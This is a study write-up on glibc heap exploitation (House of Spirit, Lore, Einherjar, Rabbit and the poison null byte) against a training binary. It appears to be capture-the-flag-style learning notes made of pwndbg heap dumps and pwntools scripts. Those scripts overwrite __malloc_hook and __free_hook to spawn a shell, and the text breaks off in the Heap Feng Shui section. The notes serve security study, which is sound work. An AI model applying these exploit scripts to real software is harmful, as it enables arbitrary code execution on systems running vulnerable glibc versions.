Fine, I'll Learn MORE Heap Exploitation
2025-01-02
Table of Contents
House of Spirit (libc < 2.30)
This exploit revolves around corrupting a pointer that is eventually passed to the free function, enabling arbitrary writes. Below is the analysis and step-by-step breakdown.
pwndbg> vis
0x603000 0x0000000000000000 0x0000000000000021 ........!.......
0x603010 0x5a5a5a5a5a5a5a5a 0x5a5a5a5a5a5a5a5a ZZZZZZZZZZZZZZZZ
0x603020 0x0a5a5a5a5a5a5a5a 0x0000000000020fe1 ZZZZZZZ......... <-- Top chunk
pwndbg> p m_arry
No symbol "m_arry" in current context.
pwndbg> f 2
#2 0x000000000040096b in main (argc=1, argv=0x7fffffffdd78) at pwnable_house_of_spirit.c:65
warning: 65 pwnable_house_of_spirit.c: No such file or directory
pwndbg> ptype m_array
type = struct chunk {
char name[8];
char *ptr;
} [8]
Pointer setup:
pwndbg> p m_array
$1 = {{
name = "AAAA\n\000\000",
ptr = 0x603010 'Z' <repeats 23 times>, "\n\341\017\002"
}, {
name = "\000\000\000\000\000\000\000",
ptr = 0x0
Target structure for arbitrary write:
pwndbg> ptype user
type = struct user {
unsigned long unused_0;
unsigned long age;
char unused_1[64];
char target[16];
char unused_2[16];
char username[64];
}
The stack overflow allows overwriting the ptr field in m_array[0], which is later used in a free operation.
pwndbg> p m_array[0]
$1 = {
name = "VVVVVVVV",
ptr = 0x5656565656565656 <error: Cannot access memory at address 0x5656565656565656>
}
Potential issues with the size flags:
0x6f = IS_MAPPED is the problem
> malloc_chunk &user
PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6f)
0x6d = NON_MAIN_ARENA is the problem.
> malloc_chunk &user
PREV_INUSE | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6d)
0x69 = fails aligned_OK
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");
0x61 = fails at av->system_mem
as the next chunk is 0
The final setup for everything
> dq &user 22
0000000000602010 A[0000000000000000 0000000000000081 <- Fake int
0000000000602020 0000000000000000 0000000000000000
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0000000000000000 0000000000000000
0000000000602050 0000000000000000 0000000000000000
0000000000602060 0058585858585858 0000000000000000
0000000000602070 0000000000000000 0000000000000000
0000000000602080 0000000000000000 0000000000000000
0000000000602090 0000000000000000]0000000000020fff <- Next chunk size field.
00000000006020a0 0000000000000000 0000000000000000
00000000006020b0 0000000000000000 0000000000000000
> fastbins
0x80: 0x602010 (user) ◂— 0
# Set the "age" field.
age = 0x81
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) *3 + p64(0x20fff)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)
free (chunk_A)
chunk_B = malloc(0x78, b"Z"*64 + b'Pwned!!',"B")
io.interactive()
Unsorted bin Perspective
# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)
free (chunk_A)
chunk_B = malloc(0x88, b"Z"*64 + b'Pwned!!',"B")
io.interactive()
pwndbg> dq &user 22
0000000000602010 0000000000000000 0000000000000091
0000000000602020 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602030 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602040 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602050 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602060 00212164656e7750 0000000000000000
0000000000602070 0000000000000000 0000000000000000
0000000000602080 0000000000000000 0000000000000000
0000000000602090 0000000000000000 0000000000000000
00000000006020a0 0000000000000090 0000000000000011
00000000006020b0 0000000000000000 0000000000000001
Code Execution
Constraints:
- Fastbin Size Range: Ensure target size fits within fastbin range.
- Flag Management: Avoid IS_MAPPED or NON_MAIN_ARENA in the size field.
- Alignment: Ensure 16-byte alignment.
- Valid Metadata: Maintain valid succeeding size fields to bypass checks.
what we need to bypass:
if (__builtin_expect (contiguous (av)
&& (char *) nextchunk
>= ((char *) av->top + chunksize(av->top)), 0))
malloc_printerr ("double free or corruption (out)");
Use a double free (fastbin dup)
# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
chunk_A = malloc(0x68, b"A" * 0x08, b"A" * 0x08)
chunk_B = malloc(0x68, b"B" * 0x08, b"B" * 0x08)
chunk_C = malloc(0x18, b"Y" * 0x18, b"C" * 0x08 + p64(heap + 0x10) )
free (chunk_A)
free (chunk_B)
free (chunk_C)
malicious = malloc(0x68, p64(libc.sym.__malloc_hook - 35), "C"*8)
chunk_D = malloc(0x68, b"D" * 0x08, b"A" * 0x08)
chunk_E = malloc(0x68, b"E" * 0x08, b"B" * 0x08)
'''
0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
'''
chunk_user = malloc(0x68,b"X"*0x13 + p64(libc.address + 0xe1fa1), "F"*8)
malloc(1,b"",b"")
io.interactive()
Takeaways
Power and Control: Exploit requires precise control over the pointer passed to free. Size Field Validity: The size field must avoid critical flags like IS_MAPPED
. Double-Free Strategy: Leveraging fastbin dup for arbitrary writes is critical to achieve exploitation.
House of Lore (Libc <2.28 )
This write-up explores a Use-After-Free (UAF) vulnerability leading to exploitation via the unsorted bin. Specifically, we demonstrate how to craft a write primitive by leveraging the unsorted bin’s bk
pointer.
- Read-After-free
- Write-after-free <- example flaw
- Call-after-free
Usortedbin Variant
Consider the following heap layout. We have control over metadata of a freed chunk:
0x603000 0x0000000000000000 0x0000000000000091 ................ <-- unsortedbin[all][0]
0x603010 0x5959595959595959 0x5a5a5a5a5a5a5a5a YYYYYYYYZZZZZZZZ
0x603020 0x000000000000000a 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
0x603070 0x0000000000000000 0x0000000000000000 ................
0x603080 0x0000000000000000 0x0000000000000000 ................
0x603090 0x0000000000000090 0x0000000000000090 ................
0x6030a0 0x0000000000000000 0x0000000000020f61 ........a.......
0x6030b0 0x0000000000000000 0x0000000000000000 ................
0x6030c0 0x0000000000000000 0x0000000000000000 ................
0x6030d0 0x0000000000000000 0x0000000000000000 ................
0x6030e0 0x0000000000000000 0x0000000000000000 ................
0x6030f0 0x0000000000000000 0x0000000000000000 ................
0x603100 0x0000000000000000 0x0000000000000000 ................
0x603110 0x0000000000000000 0x0000000000000000 ................
0x603120 0x0000000000000000 0x0000000000020ee1 ................ <-- Top chunk
Using the write-after-free vulnerability, we overwrite the bk
pointer of a chunk in the unsorted bin to point to a controlled location:
0x24918000 0x0000000000000000 0x00000000000000a1 ................ <-- unsortedbin[all][0]
0x24918010 0x0000000000000000 0x0000000000602010 ......... `.....
0x24918020 0x0000000000000000 0x0000000000000000 ................
0x24918030 0x0000000000000000 0x0000000000000000 ................
Now that we have exploited the “write-after-free”, malloc
will search the unsorted bin from back to front and conduct a partial unlink.
Before malloc
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x24918000 —▸ 0x602010 (user) ◂— 0
When malloc allocates the chunk, it processes the unsorted bin using the partial unlink process. The corrupted bk pointer is used to adjust heap structures.
After malloc
:
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x602010 (user) ◂— 0
The bk
the pointer now points to the target memory location where we want to write. The target memory location is now accessible for writing:
0000000000602010 00006567726f6547 0000000000000000 <-- overflow "username", then need valid size field.
0000000000602020 00007f96be597b58 0000000000000000 <-- main arena fd
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000 <-- Target
0000000000602050 0000000000000000 0000000000000000
The unsorted bin now looks like;
unsortedbin
all [corrupted]
FD: 0x25ecb000 ◂— 0
BK: 0x602010 (user) —▸ 0x602000 (data_start) ◂— 0xe1
Final script for the write primitive:
'''
e1 = size field
p64(0) = fake `fd` that will be overwritten
p64(elf..) = bk to not cause exploit mitigations on partial unlink.
'''
username = p64(0) + p64(0xe1) + p64(0) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)
# Free the first chunk into the unsortedbin.
free(chunk_A)
# Overwrite the bk of the free'd chunk.
edit (chunk_A, p64(0) + p64(elf.sym.user))
# Will cause the partial unlink AND then search the unsorted bin
# triggering the exploit
unsorted_bin_attack = malloc(0xd8)
# Overwrite our .data
edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")
Interesting Notes:
- Alignment Flexibility: Fake chunks can be misaligned, unlike fast bins.
- Flags: You can use invalid flags in the size field without causing immediate crashes.
- Recursive Exploitation: Pointing bk to another fake chunk or the chunk itself allows for multiple free operations.
Takeaways
Size sanity checks are important with this attack. Fake chunks bk must hold writable memory too.
Smallbins Variant
New concepts being introduced;
- Doubly Linked List
- Circular
- 0x20 - 0x3f0 (overlapping fastbin)
- First in, first out
Small variation as unsorted bin, but there’s an extra constraint. When allocating our fake chunk ,the victim bk
on the free is followed, and checks that the fd
points to the victim. This is one part of the safe unblinking check. This means you will need a heap leak to exploit this fully, in this case we do, so update script accordingly.
# Populate the "username" field.
username = p64(elf.sym.user) + p64(0xdeadbeef) + p64(heap) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)
# Edit the first chunk.
edit(chunk_A, b"Y"*8)
# Free the first chunk into the unsortedbin.
free(chunk_A)
malloc(0xa8)
# Overwrite the bk of the free'd chunk.
edit (chunk_A, p64(0) + p64(elf.sym.user))
small_bin_attack = malloc(0x98)
# Allocate our fake chunk
small_bin_attack = malloc(0x98)
edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")
visualized heap
pwndbg> vis
0x2010f000 0x0000000000000000 0x00000000000000a1 ................ <-- smallbins[0xa0][0]
0x2010f010 0x0000000000000000 0x0000000000602010 ......... `.....
0x2010f020 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x2010f120 0x0000000000000000 0x0000000000000000 ................
0x2010f130 0x0000000000000000 0x00000000000000b1 ................
0x2010f140 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x2010f1d0 0x0000000000000000 0x0000000000000000 ................
0x2010f1e0 0x0000000000000000 0x0000000000020e21 ........!....... <-- Top chunk
pwndbg> dq &user
0000000000602010 0000000000602010 00000000deadbeef
0000000000602020 000000002010f000 0000000000602000
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000
Takeaways
point it to a fake chunk we prepared
allocated the chunk from tail of smallbin
our fake fd
pointed to our chunk (paritial unlink)
allocated the smallbin fake chunk
fake chunk partial unlink check, by point bk to a fd
back to use, no size field integrity chunk
You can use misaligned chunks.
need heap link.
Largebins Variant
- Structure: Doubly linked, circular.
- Size Range: 0x400 and above.
- Holds a range of sizes:
- 0x400 => 0x410, 0x420, 0x430
- 0x440 => 0x450, 0x460, 0x470
- Maximum size: 0x80000 (no upper limit).
- Holds a range of sizes:
hold a range of sizes 0x400 => 0x410, 0x420, 0x430 0x440 => 0x450, 0x460, 0x470 Max 0x80000 no upp limit
Uses skips list:
- Chunks are sorted in reverse order.
- The first chunk of each size points to the next size, skipping over chunks of the same size.
- If a size has only one chunk, it automatically becomes the skip chunk.
- Newly freed chunks are added to the head of the skip chunks.
- Head skip chunks are allocated last.
Which list should we target? The answer is either.
Normal fd
attack on LargeBins.
Allocation routine flow malloc:
/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
if (victim != last (bin)
&& chunksize_nomask (victim)
== chunksize_nomask (victim->fd))
victim = victim->fd;
remainder_size = size - nb;
unlink (av, victim, bck, fwd);
Our fake chunk setup
dq &user
0000000000602010 0000000000000000 0000000000000401
0000000000602020 0000000000602010 0000000000602010
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000
Final exploit
username = p64(0) + p64(0x401) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 large chunks.
chunk_A = malloc(0x3f8)
malloc(0x88)
chunk_B = malloc(0x3f8)
malloc(0x88)
# Free the first chunk into the unsortedbin.
free(chunk_A)
free(chunk_B)
# right now they are in unsorted
# trigger unsorted bin search
malloc(0x408)
# Overwrite the bk of the free'd chunk.
edit(chunk_A, p64(elf.sym.user) )
chunk_C = malloc(0x3f8)
edit(chunk_C, p64(0)*4 + b"Pwned!\0")
io.interactive()
Takeaways
- An accurate size field is crucial.
- Overwriting next-size pointers is also necessary.
Overall
The house of Lore is used mostly to create fake chunks to overlap sensitive data.
House of Einherjar ( < 2.28 )
0x603000 0x0000000000000000 0x0000000000000091 ................ <-- unsortedbin[all][0]
0x603010 0x00007ffff7bafc80 0x00007ffff7bafc80 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
ptype user
type = struct user {
char username[32];
char target[16];
}
pwndbg> dq &user
0000000000602010 4141414141414141 0a41414141414141
0000000000602020 0000000000000000 0000000000000000
0000000000602030 0058585858585858 0000000000000000
0000000000602040 0000000000000000 0000000000000000
The bug: Single byte overflow
pwndbg> vis
0x603000 0x0000000000000000 0x0000000000000091 ................
0x603010 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603020 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603030 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603040 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603050 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603060 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603070 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603080 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603090 0x0a41414141414141 0x0000000000020f00 AAAAAAA......... <-- Top chunk
Targeting the top chunk alone may not yield significant results. However, overflowing an adjacent allocated or free chunk could provide potential advantages. We should target a Large bins.
0x603000 0x0000000000000000 0x0000000000000101 ................
0x603010 0x0000000000000000 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
As we cann see it will clear the PREV_INUSE
flag on an allocated chunk.
Simple pass the safe unlinking just to allocate our fake chunk over our target.
What this looks like:
0xb3ed000 0x0000000000000000 0x0000000000000091 ................
0xb3ed010 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
[ ... ]
0xb3ed080 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0xb3ed090 0x00000000deadbeef 0x0000000000000100 ................
0xb3ed0a0 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0xb3ed190 0x0000000000000000 0x0000000000020e71 ........q....... <-- Top chunk
Go after the unlinking process, by creating a fake chunk.
# Populate the username field.
username = p64(0) + p64(0x31) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)
# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)
# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))
When freeing chunk B, malloc attempts to consolidate backward because the PREV_INUSE
flag is cleared. It reads the PREV_SIZE
field (0x0000000000001080
) and subtracts this value from the chunk’s address (0x603090
), resulting in 0x602010
. This calculation points directly to the fake chunk we prepared in the data section.
vis
0x603000 0x0000000000000000 0x0000000000000091 ................
0x603010 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
[ ... ]
0x603080 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x603090 0x0000000000001080 0x0000000000000100 ................
0x6030a0 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x603190 0x0000000000000000 0x0000000000020e71 ........q....... <-- Top chunk
pwndbg> vis 0x0000000000602010
0x602010 0x0000000000000000 0x0000000000000031 ........1.......
0x602020 0x0000000000602010 0x0000000000602010 . `...... `.....
0x602030 0x0058585858585858 0x0000000000000000 XXXXXXX.........
Don’t forget about corrupted size vs. prev_size
mitigation.
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
malloc_printerr ("corrupted size vs. prev_size");
FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr ("corrupted double-linked list");
else {
When malloc reaches our chunk, it reads the size field and uses it to calculate the next address. In a normal scenario, this address would lead back to the victim chunk, as malloc had previously subtracted the prev_size field to reach the current chunk.
However, in this case, the process goes 0x31 bytes forward and returns the size field, which does not match the the pre_size field of the fake chunk. This discrepancy triggers the exploit mitigation. The vulnerability lies in our ability to control the size field. By adjusting it to include an offset of 8, we can make it point back to itself, bypassing the mitigation. The root, is that it does not compare the size_field
of the victim chunk, but rather the size_field
it read from our fake chunk.
This leads to the final exploit, which allows for a write primitive.
# Populate the username field.
username = p64(0) + p64(0x8) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)
# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)
# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))
free(chunk_B)
a = malloc(0x88)
edit(a, p64(0) *2 + b"Pwned!\0")
Takeaways
- Clear the
PREV_INUSE
flag to allow backward consolidation. - Provide a bogus
prev_size
value that points from the victim chunk to the fake chunk elsewhere in memory. - Free a chunk to trigger backward consolidation.
- During this process, the allocator consolidates the free chunk with the fake chunk and bypasses safe unlinking checks.
- Ensure the
fd
andbk
pointers in the fake chunk point back to itself to survive unlinking. - Bypass the
size
vs.prev_size
check (introduced as mitigation in version 2.26 and updated in 2.29) by crafting the fake chunk’s size field to always pass validation. - Make an additional
malloc
call to overwrite the target data section, achieving the desired write primitive.
Google Poison Null Byte Technique
Creating overlapping heap chunks.
- Target free chuink size field
vis
0x603000 0x0000000000000000 A[ 0x0000000000000021 ........!.......
0x603010 0x0000000000000000 0x0000000000000000 ................
0x603020 0x0000000000000000 ] B[ 0x0000000000000211 ................ <-- unsortedbin[all][0]
0x603030 0x00007ffff7b97b58 0x00007ffff7b97b58 X{......X{......
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
0x603070 0x0000000000000000 0x0000000000000000 ................
0x603080 0x0000000000000000 0x0000000000000000 ................
0x603090 0x0000000000000000 0x0000000000000000 ................
0x6030a0 0x0000000000000000 0x0000000000000000 ................
0x6030b0 0x0000000000000000 0x0000000000000000 ................
0x6030c0 0x0000000000000000 0x0000000000000000 ................
0x6030d0 0x0000000000000000 0x0000000000000000 ................
0x6030e0 0x0000000000000000 0x0000000000000000 ................
0x6030f0 0x0000000000000000 0x0000000000000000 ................
0x603100 0x0000000000000000 0x0000000000000000 ................
0x603110 0x0000000000000000 0x0000000000000000 ................
0x603120 0x0000000000000000 0x0000000000000000 ................
0x603130 0x0000000000000000 0x0000000000000000 ................
0x603140 0x0000000000000000 0x0000000000000000 ................
0x603150 0x0000000000000000 0x0000000000000000 ................
0x603160 0x0000000000000000 0x0000000000000000 ................
0x603170 0x0000000000000000 0x0000000000000000 ................
0x603180 0x0000000000000000 0x0000000000000000 ................
0x603190 0x0000000000000000 0x0000000000000000 ................
0x6031a0 0x0000000000000000 0x0000000000000000 ................
0x6031b0 0x0000000000000000 0x0000000000000000 ................
0x6031c0 0x0000000000000000 0x0000000000000000 ................
0x6031d0 0x0000000000000000 0x0000000000000000 ................
0x6031e0 0x0000000000000000 0x0000000000000000 ................
0x6031f0 0x0000000000000000 0x0000000000000000 ................
0x603200 0x0000000000000000 0x0000000000000000 ................
0x603210 0x0000000000000000 0x0000000000000000 ................
0x603220 0x0000000000000000 0x0000000000000000 ................
0x603230 0x0000000000000210 ] C[ 0x0000000000000090 ................
0x603240 0x0000000000000000 0x0000000000000000 ................
0x603250 0x0000000000000000 0x0000000000000000 ................
0x603260 0x0000000000000000 0x0000000000000000 ................
0x603270 0x0000000000000000 0x0000000000000000 ................
0x603280 0x0000000000000000 0x0000000000000000 ................
0x603290 0x0000000000000000 0x0000000000000000 ................
0x6032a0 0x0000000000000000 0x0000000000000000 ................
0x6032b0 0x0000000000000000 0x0000000000000000 ................
0x6032c0 0x0000000000000000 ] 0x0000000000000021 ........!.......
0x6032d0 0x0000000000000000 0x0000000000000000 ................
0x6032e0 0x0000000000000000 0x0000000000020d21 ........!....... <-- Top chunk
overflow succcessful!
vis
0x603000 0x0000000000000000 0x0000000000000021 ........!.......
0x603010 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603020 0x4141414141414141 0x0000000000000200 AAAAAAAA........ <-- unsortedbin[all][0] !!
0x603030 0x00007ffff7b97b58 0x00007ffff7b97b58 X{......X{......
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
0x603070 0x0000000000000000 0x0000000000000000 ................
remaindering process executed incorrectly because we overwrote the size field.
dq 0x603220
0000000000603220 0000000000000100 0000000000000000
0000000000603230 0000000000000210 0000000000000090
0000000000603240 0000000000000000 0000000000000000
0000000000603250 0000000000000000 0000000000000000
Final exploit code:
# Request 2 chunks.
chunk_A = malloc(0x18)
chunk_B = malloc(0x208)
chunk_C = malloc(0x88)
malloc(0x18) #Guard Rail
free(chunk_B)
edit(chunk_A, b"A"*0x18 + p8(0))
chunk_b1 = malloc(0xf8)
chunk_b2 = malloc(0xf8)
free(chunk_b1)
free(chunk_C)
Takeaways
no leaks needed
House of Rabbit
double free same concept as house of force bypass size sanity checks , large bin are exptempt, and no size cap. allocate from fake chunk
Fastbin dup -> to largest bin
First fastbin dup with unsortedbin free.
age = 1
io.sendafter(b"age: ", f"{age}".encode())
io.recvuntil(b"> ")
very_big = malloc(0x5fff8, b"Z"*8) # surpress the threshold
# Request 2 fast chunks.
fast_A = malloc(24, b"A"*8)
fast_B = malloc(24, b"B"*8)
#Fastbin dup
free(fast_A)
free(fast_B)
free(fast_A) # Double free
#This makes the fake chunk size field the age
fast_A = malloc(24, p64(elf.sym.user))
# Get our fake chunk into unsorted bin through FREE()
malloc_consolidate = malloc(0x88, b"A"*8)
free(malloc_consolidate)
io.interactive()
We ran into an issue, we can’t request a “very big chunk” as our system_mem
value is too low, thus mmap
-ing our chunk.
A Quick Aside About MMAP
mmap syscall to request large chunks, because they think it’s a one off.
Has a IS_MMAPED
flag set
mmap threshold is in mp_
pwndbg> ptype mp_
type = struct malloc_par {
unsigned long trim_threshold;
size_t top_pad;
size_t mmap_threshold; //<- here
size_t arena_test;
size_t arena_max;
int n_mmaps;
int n_mmaps_max;
int max_n_mmaps;
int no_dyn_threshold;
size_t mmapped_mem;
size_t max_mmapped_mem;
char *sbrk_base; // <- Start of default heap>
}
Right now our threshold is;
$2 = {
trim_threshold = 0x20000,
top_pad = 0x20000,
mmap_threshold = 0x20000, // <- here
arena_test = 0x8,
arena_max = 0x0,
n_mmaps = 0x1,
n_mmaps_max = 0x10000,
max_n_mmaps = 0x1,
no_dyn_threshold = 0x0,
mmapped_mem = 0x61000,
max_mmapped_mem = 0x61000,
sbrk_base = 0x34327000
}
Adjusting the system_threshold is in malloc
. This should be hit when we allocate, free, then allocate again. Thus increaing the system_mem
size.
//malloc.c:2933
if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
/* See if the dynamic brk/mmap threshold needs adjusting.
Dumped fake mmapped chunks do not affect the threshold. */
if (!mp_.no_dyn_threshold
&& chunksize_nomask (p) > mp_.mmap_threshold
&& chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
&& !DUMPED_MAIN_ARENA_CHUNK (p))
{
mp_.mmap_threshold = chunksize (p);
Using ourt exploit code'
# Get more memory in our heap.
very_big = malloc(0x5fff8, b"Z"*8) # surpress the threshold
free(very_big) # Unmap it, and adjust the threshold.
very_big = malloc(0x5fff8, b"Z"*8) # Allocate from heap, increasing the system_mem value.
Now we can see the threshold increased.
pwndbg> p/x mp_
$2 = {
trim_threshold = 0xc2000,
top_pad = 0x20000,
mmap_threshold = 0x61000,
arena_test = 0x8,
arena_max = 0x0,
n_mmaps = 0x1,
n_mmaps_max = 0x10000,
max_n_mmaps = 0x1,
no_dyn_threshold = 0x0,
mmapped_mem = 0x81000,
max_mmapped_mem = 0x81000,
sbrk_base = 0x21d7c000
}
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x21d7c000
Size: 0x60000 (with flag bits: 0x60001)
Top chunk | PREV_INUSE
Addr: 0x21ddc000
Size: 0x21000 (with flag bits: 0x21001)
And finally our fake chunk has been linked into the largebins under “user”.
largebins
0x80000-∞: 0x602040 (user) —▸ 0x7f365c798328 (main_arena+2088) ◂— 0x602040 /* '@ `' */
And finish off our exploit code with basic housr of Force primitive.
age = 1
io.sendafter(b"age: ", f"{age}".encode())
io.recvuntil(b"> ")
# Get more memory in our heap.
very_big = malloc(0x5fff8, b"Z"*8) # surpress the threshold
free(very_big) # Unmap it, and adjust the threshold.
very_big = malloc(0x5fff8, b"Z"*8) # Allocate from heap, increasing the system_mem value.
# Request 2 fast chunks.
fast_A = malloc(24, b"A"*8)
fast_B = malloc(24, b"B"*8)
#Fastbin dup
free(fast_A)
free(fast_B)
free(fast_A) # Double free
#This makes the fake chunk size field the age
fast_A = malloc(24, p64(elf.sym.user))
# Get our fake chunk into unsorted bin through FREE()
malloc_consolidate = malloc(0x88, b"A"*8)
free(malloc_consolidate)
# Now get into the largest large bin
amend_age(0x80001)
malloc(0x80008, b"D"*8)
# wrap around the VA space.
# thus no more sanity checks.
# House of force style-prmitive.
amend_age(0xfffffffffffffff1)
distance = delta(elf.sym.user, elf.sym.target - 0x20)
malloc(distance, b"E"*8)
malloc(24,b"Pwned!\0")
Code Execution
Go after free_hook
, the size in the fake chunk is too much that the remainder is causing errors (?).
change the size back to what we need.
pwndbg> u __free_hook
0x7f642c6400d0 <system> test rdi, rdi
0x7f642c6400d3 <system+3> je system+16 <system+16>
[ ... ]
# Now get into the largest large bin
amend_age(0x80001)
malloc(0x80008, b"D"*8)
# Change here
distance = (libc.sym.__free_hook - 0x20) - elf.sym.user
# wrap around the VA space.
# thus no more sanity checks.
# House of force style-prmitive.
amend_age(distance + 0x29)
# for the free()
shell = malloc(distance, b"/bin/sh\0")
malloc(24,p64(0) + p64(libc.sym.system))
free (shell)
io.interactive()
Takeaways // what we did
- Double free to link a fake chunk to the fastbins
- Malloc consoladate, fastbins -> unsorted
- 2a. freeing a normal chunk bordering the top chunk
- Set
PREV_INUSE
flag and Size to 0
- 3a. Making it’s next and next next chunk, to itself
- Once in unsortbined changed size bin to
0x60000
- 4a. Pass Unsorted Bin size check by increasing system_mem
- 4b. using
MMAP
threshold increase
- now it’s in largebin, and changed it size to the latgest possible value
- 5a. allocation from fake chunk to target to data
- Allocate to overwrite the data.
Heap Feng Shui
How we can manipulate heap in our favour. House of Rabbit again, but what if we can’t request fastbin sizes? Double free: call free on an arbritrary address, and they only need size fields.
Use a dangling pointer. How can we make a fastbin sized chunk? Remaindering of course!
Goal: Have a dangling pointer point a fake fastbin chunk
0x13b25000 0x0000000000000000 0x0000000000000091 ................
0x13b25010 0x4545454545454545 0x00007f8c57b97bf8 EEEEEEEE.{.W....
0x13b25020 0x0000000000000000 0x0000000000000000 ................
0x13b25030 0x0000000000000000 0x0000000000000000 ................
0x13b25040 0x0000000000000000 0x0000000000000000 ................
0x13b25050 0x0000000000000000 0x0000000000000000 ................
0x13b25060 0x0000000000000000 0x0000000000000000 ................
0x13b25070 0x0000000000000000 0x0000000000000000 ................
0x13b25080 0x0000000000000000 0x0000000000000000 ................
0x13b25090 0x0000000000000090 A[ 0x0000000000000021 ........!....... <-- fastbins[0x20][0], unsortedbin[all][0]
0x13b250a0 0x00007f8c57b97b58 0x00007f8c57b97b58 X{.W....X{.W....
0x13b250b0 0x0000000000000020 ] 0x0000000000000090 ...............
0x13b250c0 0x4444444444444444 0x0000000000000000 DDDDDDDD........
0x13b250d0 0x0000000000000000 0x0000000000000000 ................
0x13b250e0 0x0000000000000000 0x0000000000000000 ................
